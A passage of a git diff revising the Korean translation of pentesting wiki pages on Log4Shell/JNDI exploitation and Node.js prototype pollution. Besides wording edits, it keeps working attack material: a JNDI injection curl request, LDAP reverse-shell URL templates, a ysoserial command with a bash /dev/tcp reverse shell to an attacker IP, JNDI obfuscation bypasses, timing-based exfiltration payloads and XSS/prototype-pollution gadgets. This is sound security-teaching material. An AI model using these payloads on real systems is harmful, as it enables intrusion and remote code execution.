+코드를 몇 분만 읽으면, _com.feihong.ldap.LdapServer_와 _com.feihong.ldap.HTTPServer_에서 **LDAP 및 HTTP 서버가 생성되는 방법**을 볼 수 있습니다. LDAP 서버는 어떤 페이로드를 제공해야 하는지 이해하고, 피해자를 HTTP 서버로 리디렉션하여 익스플로잇을 제공합니다.\
 _com.feihong.ldap.gadgets_에서는 원하는 작업을 실행하는 데 사용할 수 있는 **특정 가젯**을 찾을 수 있습니다(잠재적으로 임의 코드를 실행할 수 있음). 그리고 _com.feihong.ldap.template_에서는 **익스플로잇을 생성하는** 다양한 템플릿 클래스를 볼 수 있습니다.
 
 모든 사용 가능한 익스플로잇은 **`java -jar JNDIExploit-1.2-SNAPSHOT.jar -u`**로 확인할 수 있습니다. 유용한 것들은:
@@ -264,7 +264,7 @@ ldap://null:1389/Basic/Command/Base64/[base64_encoded_cmd]
 ldap://null:1389/Basic/ReverseShell/[ip]/[port]
 # But there are a lot more
 ```
-그래서, 우리의 예제에서는 이미 취약한 도커 앱이 실행되고 있습니다. 이를 공격하기 위해:
+그래서, 우리의 예제에서 우리는 이미 취약한 도커 앱이 실행되고 있습니다. 이를 공격하기 위해:
 ```bash
 # Create a file inside of th vulnerable host:
 curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
@@ -296,14 +296,14 @@ _이 공격은 사용자 정의 생성된 자바 객체를 사용하여 **THM so
 
 ### RCE - ysoserial & JNDI-Exploit-Kit
 
-이 옵션은 **지정된 클래스만 신뢰하도록 구성된 Java 버전을 공격하는 데 정말 유용합니다.** 따라서 **ysoserial**은 **임의 코드를 실행하는 데 사용할 수 있는 신뢰할 수 있는 클래스의 **직렬화**를 생성하는 데 사용됩니다 (_ysoserial에 의해 악용된 신뢰할 수 있는 클래스는 공격이 작동하기 위해 피해자 자바 프로그램에서 사용되어야 합니다_). 
+이 옵션은 **지정된 클래스만 신뢰하도록 구성된 Java 버전을 공격하는 데 정말 유용합니다**. 따라서 **ysoserial**은 **임의 코드를 실행하는 데 사용할 수 있는 신뢰할 수 있는 클래스의 직렬화를 생성하는 데 사용됩니다** (_ysoserial에 의해 악용된 신뢰할 수 있는 클래스는 공격이 작동하기 위해 피해자 자바 프로그램에서 사용되어야 합니다_).
 
 **ysoserial** 또는 [**ysoserial-modified**](https://github.com/pimps/ysoserial-modified)를 사용하여 JNDI에 의해 다운로드될 역직렬화 공격을 생성할 수 있습니다:
 ```bash
 # Rev shell via CommonsCollections5
 java -jar ysoserial-modified.jar CommonsCollections5 bash 'bash -i >& /dev/tcp/10.10.14.10/7878 0>&1' > /tmp/cc5.ser
 ```
-[**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit)를 사용하여 **JNDI 링크**를 생성합니다. 여기서 익스플로잇은 취약한 머신으로부터의 연결을 기다립니다. JNDI-Exploit-Kit에 의해 자동으로 생성될 수 있는 **다양한 익스플로잇**이나 심지어 **자신의 역직렬화 페이로드**(자신이 생성한 것 또는 ysoserial)를 제공할 수 있습니다.
+[**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit)를 사용하여 **JNDI 링크**를 생성합니다. 여기서 익스플로잇은 취약한 머신으로부터의 연결을 기다립니다. JNDI-Exploit-Kit에 의해 자동으로 생성될 수 있는 **다양한 익스플로잇**을 제공하거나, 심지어 **자신의 역직렬화 페이로드**(자신이 생성한 것 또는 ysoserial)를 사용할 수 있습니다.
 ```bash
 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tmp/cc5.ser
 ```
@@ -332,7 +332,7 @@ ${${lower:jnd}${lower:${upper:ı}}:ldap://...} //Notice the unicode "i"
 - [https://github.com/Qualys/log4jscanwin](https://github.com/Qualys/log4jscanwin)
 - [https://github.com/hillu/local-log4j-vuln-scanner](https://github.com/hillu/local-log4j-vuln-scanner)
 - [https://github.com/logpresso/CVE-2021-44228-Scanner](https://github.com/logpresso/CVE-2021-44228-Scanner)
-- [https://github.com/palantir/log4j-sniffer](https://github.com/palantir/log4j-sniffer) - 로컬 취약한 라이브러리 찾기
+- [https://github.com/palantir/log4j-sniffer](https://github.com/palantir/log4j-sniffer) - 로컬 취약 라이브러리 찾기
 
 ### 테스트할 실험실
 
@@ -347,9 +347,9 @@ ${${lower:jnd}${lower:${upper:ı}}:ldap://...} //Notice the unicode "i"
 
 Log4j의 [**보안 페이지**](https://logging.apache.org/log4j/2.x/security.html)에는 흥미로운 문장이 있습니다:
 
-> 버전 2.16.0(자바 8부터)부터는 **메시지 조회 기능이 완전히 제거되었습니다**. **구성에서의 조회는 여전히 작동합니다**. 게다가, Log4j는 이제 기본적으로 JNDI 접근을 비활성화합니다. 구성에서의 JNDI 조회는 이제 명시적으로 활성화해야 합니다.
+> 버전 2.16.0 (Java 8용)부터는 **메시지 조회 기능이 완전히 제거되었습니다**. **구성에서의 조회는 여전히 작동합니다**. 또한, Log4j는 이제 기본적으로 JNDI에 대한 접근을 비활성화합니다. 구성에서 JNDI 조회는 이제 명시적으로 활성화해야 합니다.
 
-> 버전 2.17.0(자바 7 및 자바 6의 2.12.3 및 2.3.1 포함)부터는 **구성에서의 조회 문자열만 재귀적으로 확장됩니다**; 다른 사용에서는 최상위 조회만 해결되며, 중첩된 조회는 해결되지 않습니다.
+> 버전 2.17.0부터 (Java 7 및 Java 6의 경우 2.12.3 및 2.3.1), **구성에서의 조회 문자열만 재귀적으로 확장됩니다**; 다른 사용에서는 최상위 조회만 해결되며, 중첩된 조회는 해결되지 않습니다.
 
 이는 기본적으로 `jndi` 악용을 **잊어버릴 수 있다는 것을 의미합니다**. 게다가 **재귀 조회**를 수행하려면 이를 구성해야 합니다.
 
@@ -377,16 +377,16 @@ CTF에서는 log4J를 사용하는 자바 애플리케이션의 **stderr에 접
 
 ![](<../../images/image (683).png>)
 
-이것은 오류 메시지 내의 데이터를 유출하는 데 유용하지 않았습니다. 왜냐하면 변환 패턴 이전에 조회가 해결되지 않았기 때문이지만, 감지와 같은 다른 용도로 유용할 수 있습니다.
+이것은 오류 메시지 내에서 데이터를 유출하는 데 유용하지 않았습니다. 왜냐하면 변환 패턴 이전에 조회가 해결되지 않았기 때문이지만, 탐지와 같은 다른 용도로는 유용할 수 있습니다.
 
 ### Conversion Patterns Regexes
 
-그러나, **정규 표현식을 지원하는 변환 패턴**을 사용하여 정규 표현식을 사용하고 **이진 검색** 또는 **시간 기반** 동작을 악용하여 조회에서 정보를 유출할 수 있습니다.
+그러나, **정규 표현식을 지원하는 변환 패턴**을 사용하여 정규 표현식을 이용해 조회에서 정보를 유출하고 **이진 검색** 또는 **시간 기반** 동작을 악용하는 것이 가능합니다.
 
 - **예외 메시지를 통한 이진 검색**
 
 변환 패턴 **`%replace`**는 **정규 표현식**을 사용하여 **문자열**의 **내용**을 **대체**하는 데 사용할 수 있습니다. 작동 방식은 다음과 같습니다: `replace{pattern}{regex}{substitution}`\
-이 동작을 악용하여 정규 표현식이 문자열 내의 어떤 것과도 일치하면 **예외를 발생시키고** 일치하지 않으면 예외가 발생하지 않도록 만들 수 있습니다:
+이 동작을 악용하여 **정규 표현식이 문자열 내의 어떤 것과도 일치하면 예외를 발생시키고** 발견되지 않으면 예외가 발생하지 않도록 만들 수 있습니다:
 ```bash
 %replace{${env:FLAG}}{^CTF.*}{${error}}
 # The string searched is the env FLAG, the regex searched is ^CTF.*
@@ -397,7 +397,7 @@ CTF에서는 log4J를 사용하는 자바 애플리케이션의 **stderr에 접
 앞서 언급했듯이, **`%replace`**는 **regexes**를 지원합니다. 따라서 플래그가 발견될 경우 **타임아웃**을 유발하기 위해 [**ReDoS 페이지**](../regular-expression-denial-of-service-redos.md)의 페이로드를 사용할 수 있습니다.\
 예를 들어, `%replace{${env:FLAG}}{^(?=CTF)((.`_`)`_`)*salt$}{asd}`와 같은 페이로드는 해당 CTF에서 **타임아웃**을 유발할 것입니다.
 
-이 [**작성글**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/)에서는 ReDoS 공격 대신 **증폭 공격**을 사용하여 응답의 시간 차이를 유발했습니다:
+이 [**writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/)에서는 ReDoS 공격 대신 **증폭 공격**을 사용하여 응답의 시간 차이를 유발했습니다:
 
 > ```
 > /%replace{
@@ -414,10 +414,9 @@ CTF에서는 log4J를 사용하는 자바 애플리케이션의 **stderr에 접
 > }{#}{######################################################}
 > }{#}{######################################################}
 > }{#}{######################################################}
-> }{#}{######################################################}
 > ```
 >
-> 플래그가 `flagGuess`로 시작하면 전체 플래그는 29개의 `#`로 대체됩니다 (이 문자를 사용한 이유는 플래그의 일부가 아닐 가능성이 높기 때문입니다). **결과적으로 29개의 `#`는 54개의 `#`로 대체됩니다**. 이 과정은 **6번** 반복되어 총 ` 29*54*54^6* =`` `` `**`96816014208`** **`#`가 됩니다!**
+> 플래그가 `flagGuess`로 시작하면 전체 플래그는 29개의 `#`로 대체됩니다 (이 문자는 플래그의 일부가 아닐 가능성이 높기 때문에 사용했습니다). **결과적으로 29개의 `#`는 각각 54개의 `#`로 대체됩니다**. 이 과정은 **6번** 반복되어 총 ` 29*54*54^6* =`` `` `**`96816014208`** **`#`가 생성됩니다!**
 >
 > 이렇게 많은 `#`를 대체하면 Flask 애플리케이션의 10초 타임아웃이 발생하여 HTTP 상태 코드 500이 사용자에게 전송됩니다. (플래그가 `flagGuess`로 시작하지 않으면 500이 아닌 상태 코드를 받게 됩니다)
 
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
index 41075e9cc..7019de4fc 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md
@@ -1,4 +1,4 @@
-# NodeJS - \_\_proto\_\_ 및 프로토타입 오염
+# NodeJS - \_\_proto\_\_ & prototype Pollution
 
 {{#include ../../../banners/hacktricks-training.md}}
 
@@ -31,21 +31,21 @@ var employee1 = new Employee("Generic Employee", "Developer")
 
 employee1.__proto__
 ```
-### Prototypes in JavaScript
+### JavaScript의 프로토타입
 
 JavaScript는 런타임에 프로토타입 속성을 수정, 추가 또는 삭제할 수 있습니다. 이 유연성은 클래스 기능의 동적 확장을 가능하게 합니다.
 
-`toString` 및 `valueOf`와 같은 함수는 그 동작을 변경하도록 수정될 수 있으며, 이는 JavaScript의 프로토타입 시스템의 적응 가능한 특성을 보여줍니다.
+`toString` 및 `valueOf`와 같은 함수는 그 동작을 변경하기 위해 수정될 수 있으며, 이는 JavaScript의 프로토타입 시스템의 적응 가능한 특성을 보여줍니다.
 
-## Inheritance
+## 상속
 
 프로토타입 기반 프로그래밍에서 속성/메서드는 객체가 클래스에서 상속받습니다. 이러한 클래스는 다른 클래스의 인스턴스나 빈 객체에 속성/메서드를 추가하여 생성됩니다.
 
-다른 객체의 프로토타입 역할을 하는 객체(예: `myPersonObj`)에 속성이 추가되면, 상속받는 객체는 이 새로운 속성에 접근할 수 있습니다. 그러나 이 속성은 명시적으로 호출되지 않는 한 자동으로 표시되지 않습니다.
+다른 객체의 프로토타입 역할을 하는 객체(예: `myPersonObj`)에 속성이 추가될 때, 상속받는 객체는 이 새로운 속성에 접근할 수 있다는 점에 유의해야 합니다. 그러나 이 속성은 명시적으로 호출되지 않는 한 자동으로 표시되지 않습니다.
 
-## \_\_proto\_\_ pollution <a href="#id-0d0a" id="id-0d0a"></a>
+## \_\_proto\_\_ 오염 <a href="#id-0d0a" id="id-0d0a"></a>
 
-## Exploring Prototype Pollution in JavaScript
+## JavaScript에서 프로토타입 오염 탐색
 
 JavaScript 객체는 키-값 쌍으로 정의되며 JavaScript Object 프로토타입에서 상속됩니다. 이는 Object 프로토타입을 변경하면 환경의 모든 객체에 영향을 미칠 수 있음을 의미합니다.
 
@@ -76,7 +76,7 @@ car1.announce() // Outputs "Beep beep!"
 car1.__proto__.__proto__.isVehicle = true
 console.log(car1.isVehicle) // Outputs true
 ```
-## 프로토타입 오염
+## prototype pollution
 
 `__proto__` 사용이 제한된 시나리오에서는 함수의 프로토타입을 수정하는 것이 대안입니다:
 ```javascript
@@ -121,7 +121,7 @@ console.log("Hello!")
 
 ### 클래스에서 Object.prototype으로
 
-특정 객체를 **오염시킬 수 있는** 시나리오에서 **`Object.prototype`에 접근해야** 하는 경우, 다음과 같은 코드로 검색할 수 있습니다:
+특정 객체를 **오염시킬 수 있는** 시나리오에서 **`Object.prototype`에 도달해야** 하는 경우, 다음과 같은 코드로 검색할 수 있습니다:
 ```javascript
 // From https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/
 
@@ -144,7 +144,7 @@ console.log(key1 + "." + key2)
 ```
 ### 배열 요소 오염
 
-JS에서 객체의 속성을 오염시킬 수 있는 것처럼, 배열에 오염시킬 수 있는 접근 권한이 있다면 **인덱스를 통해 접근 가능한 배열의 값도 오염시킬 수 있습니다** (값을 덮어쓸 수는 없으므로, 어떤 식으로든 사용되지만 쓰이지 않는 인덱스를 오염시켜야 합니다).
+JS에서 객체의 속성을 오염시킬 수 있는 것처럼, 배열에 오염시킬 수 있는 접근 권한이 있다면 **인덱스를 통해 접근 가능한 배열의 값도 오염시킬 수 있습니다** (값을 덮어쓸 수는 없으므로, 어떤 식으로든 사용되지만 작성되지 않은 인덱스를 오염시켜야 합니다).
 ```javascript
 c = [1, 2]
 a = []
@@ -156,7 +156,7 @@ c[1] // 2 -- not
 ```
 ### Html elements pollution
 
-JS를 통해 HTML 요소를 생성할 때 **`innerHTML`** 속성을 **덮어쓰는** 것이 가능하여 **임의의 HTML 코드를 작성**할 수 있습니다. [이 글에서 아이디어와 예시](https://blog.huli.tw/2022/04/25/en/intigriti-0422-xss-challenge-author-writeup/)입니다.
+JS를 통해 HTML 요소를 생성할 때 **`innerHTML`** 속성을 **덮어쓰는** 것이 가능하여 **임의의 HTML 코드를 작성**할 수 있습니다. [이 글에서 아이디어와 예시](https://blog.huli.tw/2022/04/25/en/intigriti-0422-xss-challenge-author-writeup/)를 참조하세요.
 ```javascript
 // Create element
 devSettings["root"] = document.createElement('main')
@@ -171,13 +171,13 @@ settings[root][ownerDocument][body][innerHTML]="<svg onload=alert(document.domai
 
 ### 기본 예제
 
-프로토타입 오염은 `Object.prototype`의 속성을 덮어쓸 수 있는 애플리케이션의 결함으로 인해 발생합니다. 이는 대부분의 객체가 `Object.prototype`에서 속성을 파생받기 때문에 의미합니다.
+프로토타입 오염은 `Object.prototype`의 속성을 덮어쓸 수 있는 애플리케이션의 결함으로 인해 발생합니다. 이는 대부분의 객체가 `Object.prototype`에서 속성을 파생시키기 때문에 의미합니다.
 
 가장 쉬운 예는 확인될 객체의 **정의되지 않은 속성에 값을 추가하는 것**입니다.
 ```javascript
 if (user.admin) {
 ```
-속성이 **`admin`이 정의되지 않은 경우** PP를 악용하고 다음과 같이 True로 설정할 수 있습니다:
+속성 **`admin`이 정의되지 않은 경우** PP를 악용하고 다음과 같이 True로 설정할 수 있습니다:
 ```javascript
 Object.prototype.isAdmin = true
 let user = {}
@@ -213,7 +213,7 @@ client-side-prototype-pollution.md
 
 ### CVE-2019–11358: jQuery $ .extend를 통한 프로토타입 오염 공격
 
-[자세한 내용은 이 기사를 확인하세요](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7) jQuery에서 `$ .extend` 함수는 깊은 복사 기능이 잘못 사용될 경우 프로토타입 오염을 초래할 수 있습니다. 이 함수는 일반적으로 객체를 복제하거나 기본 객체에서 속성을 병합하는 데 사용됩니다. 그러나 잘못 구성되면 새로운 객체를 위한 속성이 대신 프로토타입에 할당될 수 있습니다. 예를 들어:
+[자세한 내용은 이 기사를 확인하세요](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7) jQuery에서 `$ .extend` 함수는 깊은 복사 기능이 잘못 사용될 경우 프로토타입 오염을 초래할 수 있습니다. 이 함수는 일반적으로 객체를 복제하거나 기본 객체의 속성을 병합하는 데 사용됩니다. 그러나 잘못 구성되면 새로운 객체를 위한 속성이 대신 프로토타입에 할당될 수 있습니다. 예를 들어:
 ```javascript
 $.extend(true, {}, JSON.parse('{"__proto__": {"devMode": true}}'))
 console.log({}.devMode) // Outputs: true
@@ -230,14 +230,14 @@ console.log({}.devMode) // Outputs: true
 
 {% embed url="https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2" %}
 
-### 프로토타입 오염을 감지하는 도구
+### 프로토타입 오염 탐지를 위한 도구
 
-- [**Server-Side-Prototype-Pollution-Gadgets-Scanner**](https://github.com/doyensec/Server-Side-Prototype-Pollution-Gadgets-Scanner): 웹 애플리케이션에서 서버 측 프로토타입 오염 취약점을 감지하고 분석하기 위해 설계된 Burp Suite 확장입니다. 이 도구는 요청을 스캔하여 잠재적인 프로토타입 오염 문제를 식별하는 과정을 자동화합니다. 이는 알려진 가젯 - 프로토타입 오염을 활용하여 해로운 작업을 실행하는 방법 - 을 악용하며, 특히 Node.js 라이브러리에 중점을 둡니다.
+- [**Server-Side-Prototype-Pollution-Gadgets-Scanner**](https://github.com/doyensec/Server-Side-Prototype-Pollution-Gadgets-Scanner): 웹 애플리케이션에서 서버 측 프로토타입 오염 취약점을 탐지하고 분석하기 위해 설계된 Burp Suite 확장입니다. 이 도구는 요청을 스캔하여 잠재적인 프로토타입 오염 문제를 식별하는 과정을 자동화합니다. 이는 알려진 가젯 - 프로토타입 오염을 활용하여 해로운 작업을 실행하는 방법 - 을 악용하며, 특히 Node.js 라이브러리에 중점을 둡니다.
 - [**server-side-prototype-pollution**](https://github.com/portswigger/server-side-prototype-pollution): 이 확장은 서버 측 프로토타입 오염 취약점을 식별합니다. 이는 [서버 측 프로토타입 오염](https://portswigger.net/research/server-side-prototype-pollution)에서 설명된 기술을 사용합니다.
 
 ### NodeJS의 AST 프로토타입 오염
 
-NodeJS는 템플릿 엔진 및 TypeScript와 같은 기능을 위해 JavaScript에서 추상 구문 트리(AST)를 광범위하게 활용합니다. 이 섹션에서는 템플릿 엔진, 특히 Handlebars와 Pug에서 프로토타입 오염과 관련된 취약점을 탐구합니다.
+NodeJS는 템플릿 엔진 및 TypeScript와 같은 기능을 위해 JavaScript에서 추상 구문 트리(AST)를 광범위하게 활용합니다. 이 섹션에서는 템플릿 엔진, 특히 Handlebars와 Pug에서의 프로토타입 오염과 관련된 취약점을 탐구합니다.
 
 #### Handlebars 취약점 분석
 
@@ -248,8 +248,8 @@ Handlebars 템플릿 엔진은 프로토타입 오염 공격에 취약합니다.
 악용은 Handlebars에 의해 생성된 AST(추상 구문 트리)를 활용하며, 다음 단계를 따릅니다:
 
 1. **파서 조작**: 처음에 파서는 `NumberLiteral` 노드를 통해 값이 숫자여야 한다고 강제합니다. 프로토타입 오염은 이를 우회할 수 있어 비숫자 문자열을 삽입할 수 있게 합니다.
-2. **컴파일러에 의한 처리**: 컴파일러는 AST 객체 또는 문자열 템플릿을 처리할 수 있습니다. `input.type`이 `Program`과 같으면 입력이 미리 파싱된 것으로 간주되어 악용될 수 있습니다.
-3. **코드 주입**: `Object.prototype`을 조작하여 템플릿 함수에 임의의 코드를 주입할 수 있으며, 이는 원격 코드 실행으로 이어질 수 있습니다.
+2. **컴파일러에 의한 처리**: 컴파일러는 AST 객체 또는 문자열 템플릿을 처리할 수 있습니다. 만약 `input.type`이 `Program`과 같다면, 입력은 미리 파싱된 것으로 간주되어 악용될 수 있습니다.
+3. **코드 주입**: `Object.prototype`의 조작을 통해 템플릿 함수에 임의의 코드를 주입할 수 있으며, 이는 원격 코드 실행으로 이어질 수 있습니다.
 
 Handlebars 취약점의 악용을 보여주는 예:
 ```javascript
@@ -343,10 +343,10 @@ requests.get(TARGET_URL)
 5. **Map 사용**: 키-값 쌍을 저장할 때 `Object` 대신 `Map`을 사용해야 합니다.
 6. **라이브러리 업데이트**: 라이브러리를 정기적으로 업데이트하여 보안 패치를 통합할 수 있습니다.
 7. **린터 및 정적 분석 도구**: ESLint와 적절한 플러그인을 사용하여 프로토타입 오염 취약점을 감지하고 방지하는 도구를 사용하세요.
-8. **코드 리뷰**: 프로토타입 오염과 관련된 잠재적 위험을 식별하고 수정하기 위해 철저한 코드 리뷰를 구현하세요.
+8. **코드 리뷰**: 프로토타입 오염과 관련된 잠재적 위험을 식별하고 수정하기 위해 철저한 코드 리뷰를 시행하세요.
 9. **보안 교육**: 개발자에게 프로토타입 오염의 위험과 안전한 코드를 작성하기 위한 모범 사례에 대해 교육하세요.
 10. **라이브러리 사용 시 주의**: 서드파티 라이브러리를 사용할 때 주의하세요. 그들의 보안 상태를 평가하고, 특히 객체를 조작하는 코드에 대해 검토하세요.
-11. **런타임 보호**: 프로토타입 오염 공격을 감지하고 방지할 수 있는 보안 중심의 npm 패키지를 사용하는 등의 런타임 보호 메커니즘을 사용하세요.
+11. **런타임 보호**: 프로토타입 오염 공격을 감지하고 방지할 수 있는 보안 중심의 npm 패키지를 사용하는 등 런타임 보호 메커니즘을 사용하세요.
 
 ## 참고 문헌
 
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
index b9d4894f7..920bd23cb 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution.md
@@ -21,13 +21,13 @@ return "test"
 ```
 ### Prototype Pollution의 근본 원인 찾기 <a href="#id-5530" id="id-5530"></a>
 
-프로토타입 오염 취약점이 도구에 의해 식별되면, 코드가 지나치게 복잡하지 않은 경우, Chrome 개발자 도구에서 `location.hash`, `decodeURIComponent` 또는 `location.search`와 같은 키워드를 검색하여 취약점을 찾을 수 있습니다. 이 접근 방식은 JavaScript 코드의 취약한 섹션을 정확히 찾아내는 데 도움이 됩니다.
+프로토타입 오염 취약점이 도구에 의해 식별되면, 코드가 지나치게 복잡하지 않은 경우, Chrome 개발자 도구에서 `location.hash`, `decodeURIComponent`, 또는 `location.search`와 같은 키워드를 검색하여 취약점을 찾을 수 있습니다. 이 접근 방식은 JavaScript 코드의 취약한 섹션을 정확히 찾아내는 데 도움이 됩니다.
 
 더 크고 복잡한 코드베이스의 경우, 취약한 코드를 발견하는 간단한 방법은 다음 단계를 포함합니다:
 
 1. 도구를 사용하여 취약점을 식별하고 생성자에서 속성을 설정하도록 설계된 페이로드를 얻습니다. ppmap에서 제공하는 예시는 다음과 같을 수 있습니다: `constructor[prototype][ppmap]=reserved`.
 2. 페이지에서 실행될 JavaScript 코드의 첫 번째 줄에 중단점을 설정합니다. 페이로드로 페이지를 새로 고치고 이 중단점에서 실행을 일시 중지합니다.
-3. JavaScript 실행이 일시 중지된 동안, JS 콘솔에서 다음 스크립트를 실행합니다. 이 스크립트는 'ppmap' 속성이 생성될 때 신호를 보내며, 그 출처를 찾는 데 도움이 됩니다:
+3. JavaScript 실행이 일시 중지된 동안, JS 콘솔에서 다음 스크립트를 실행합니다. 이 스크립트는 'ppmap' 속성이 생성될 때 신호를 보내어 그 출처를 찾는 데 도움을 줍니다:
 ```javascript
 function debugAccess(obj, prop, debugGet = true) {
 var origValue = obj[prop]
@@ -46,9 +46,9 @@ origValue = val
 
 debugAccess(Object.prototype, "ppmap")
 ```
-4. **소스** 탭으로 돌아가서 “스크립트 실행 재개”를 선택합니다. JavaScript는 계속 실행되며, 'ppmap' 속성이 예상대로 오염됩니다. 제공된 스니펫을 활용하면 'ppmap' 속성이 오염된 정확한 위치를 식별할 수 있습니다. **호출 스택**을 검사하면 오염이 발생한 다양한 스택을 관찰할 수 있습니다.
+4. **소스** 탭으로 돌아가서 “스크립트 실행 재개”를 선택합니다. JavaScript는 계속 실행되며, 'ppmap' 속성이 예상대로 오염됩니다. 제공된 스니펫을 활용하면 'ppmap' 속성이 오염되는 정확한 위치를 식별할 수 있습니다. **호출 스택**을 검사하면 오염이 발생한 다양한 스택을 관찰할 수 있습니다.
 
-어떤 스택을 조사할지 결정할 때, JavaScript 라이브러리 파일과 관련된 스택을 목표로 하는 것이 유용합니다. 프로토타입 오염은 이러한 라이브러리 내에서 자주 발생하기 때문입니다. 라이브러리 파일에 대한 연결을 검사하여 관련 스택을 식별합니다(오른쪽에 표시되며, 안내를 위한 이미지와 유사합니다). 4행과 6행과 같이 여러 스택이 있는 경우, 4행의 스택이 논리적인 선택입니다. 이는 오염의 초기 발생을 나타내며, 따라서 취약점의 근본 원인입니다. 스택을 클릭하면 취약한 코드로 이동합니다.
+어떤 스택을 조사할지 결정할 때, JavaScript 라이브러리 파일과 관련된 스택을 목표로 하는 것이 유용합니다. 프로토타입 오염은 이러한 라이브러리 내에서 자주 발생하기 때문입니다. 라이브러리 파일에 대한 연결을 검사하여 관련 스택을 식별합니다(오른쪽에 표시된 이미지와 유사하게). 4행과 6행과 같이 여러 스택이 있는 경우, 4행의 스택이 논리적인 선택입니다. 이는 오염의 초기 발생을 나타내며, 따라서 취약점의 근본 원인입니다. 스택을 클릭하면 취약한 코드로 이동합니다.
 
 ![https://miro.medium.com/max/1400/1*S8NBOl1a7f1zhJxlh-6g4w.jpeg](https://miro.medium.com/max/1400/1*S8NBOl1a7f1zhJxlh-6g4w.jpeg)
 
@@ -67,9 +67,9 @@ debugAccess(Object.prototype, "ppmap")
 - [https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution)
 - [https://github.com/BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution)
 
-## PP를 통한 HTML 세니타이저 우회
+## PP를 통한 HTML 세정기 우회
 
-[**이 연구**](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)는 일부 HTML 세니타이저 라이브러리에서 제공하는 **세니타이즈를 우회하기 위해 사용할 PP 가젯**을 보여줍니다:
+[**이 연구**](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)는 일부 HTML 세정기 라이브러리에서 제공하는 **세정기를 우회하기 위해 사용할 PP 가젯**을 보여줍니다:
 
 - **sanitize-html**
 
@@ -101,7 +101,7 @@ const node = goog.dom.safeHtmlToNode(sanitized);
 document.body.append(node);
 </script>
 ```
-## References
+## 참고문헌
 
 - [https://infosecwriteups.com/hunting-for-prototype-pollution-and-its-vulnerable-code-on-js-libraries-5bab2d6dc746](https://infosecwriteups.com/hunting-for-prototype-pollution-and-its-vulnerable-code-on-js-libraries-5bab2d6dc746)
 - [https://blog.s1r1us.ninja/research/PP](https://blog.s1r1us.ninja/research/PP)
diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
index 7538df2c7..8b9d1174c 100644
--- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
+++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md
@@ -20,7 +20,7 @@ res.send(req.body)
 ```json
 { "__proto__": { "_body": true, "body": "<script>evil()" } }
 ```
-**`body`** 및 **`_body`** 속성을 **오염시킴으로써**, **Express가 HTML 콘텐츠 유형을 제공하도록** 하고, `_body` 속성을 반영하게 할 수 있어 저장된 XSS를 초래할 수 있습니다.
+**`body`** 및 **`_body`** 속성을 **오염시킴으로써**, **Express가 HTML 콘텐츠 유형을 제공하고** `_body` 속성을 반영하게 할 수 있으며, 이로 인해 저장된 XSS가 발생할 수 있습니다.
 
 ### UTF7 렌더링
 
@@ -32,11 +32,11 @@ Express가 **UTF-7 콘텐츠를 렌더링하도록** 만들 수 있습니다:
 
 ### JSON 공백
 
-다음 PP는 JSON 내부의 속성에 추가 공백을 만들어 기능이 중단되지 않도록 합니다:
+다음 PP는 JSON 내부의 속성에 추가 공백을 추가하여 기능이 손상되지 않도록 합니다:
 ```json
 { "__proto__": { "json spaces": " " } }
 ```
-그럼 반사된 JSON은 다음과 같습니다:
+그럼 반사된 JSON은 다음과 같이 보입니다:
 ```json
 {"foo":  "bar"} -- Note the extra space
 ```
@@ -76,11 +76,11 @@ Express가 **UTF-7 콘텐츠를 렌더링하도록** 만들 수 있습니다:
 ```
 ### Reflected Value
 
-응용 프로그램이 응답에 객체를 포함할 때, **`__proto__`와 함께 비정상적인 이름의 속성을 생성하는 것**은 유용할 수 있습니다. 특히, **응답에 비정상적인 속성만 반환되는 경우**, 이는 응용 프로그램의 취약점을 나타낼 수 있습니다:
+응용 프로그램이 응답에 객체를 포함할 때, **`__proto__`와 함께 비정상적인 이름의 속성을 생성하는 것**은 유용할 수 있습니다. 특히, **응답에 비정상적인 속성만 반환되는 경우** 이는 응용 프로그램의 취약점을 나타낼 수 있습니다:
 ```json
 { "unusualName": "value", "__proto__": "test" }
 ```
-또한 Lodash와 같은 라이브러리가 사용되는 시나리오에서는 프로토타입 오염(PP)을 통해 속성을 설정하고 객체 내부에서 직접 설정하는 것이 또 다른 진단 접근 방식을 제공합니다. 이러한 속성이 응답에서 생략되면, Lodash가 병합하기 전에 대상 객체에서 속성의 존재를 확인하고 있음을 나타냅니다:
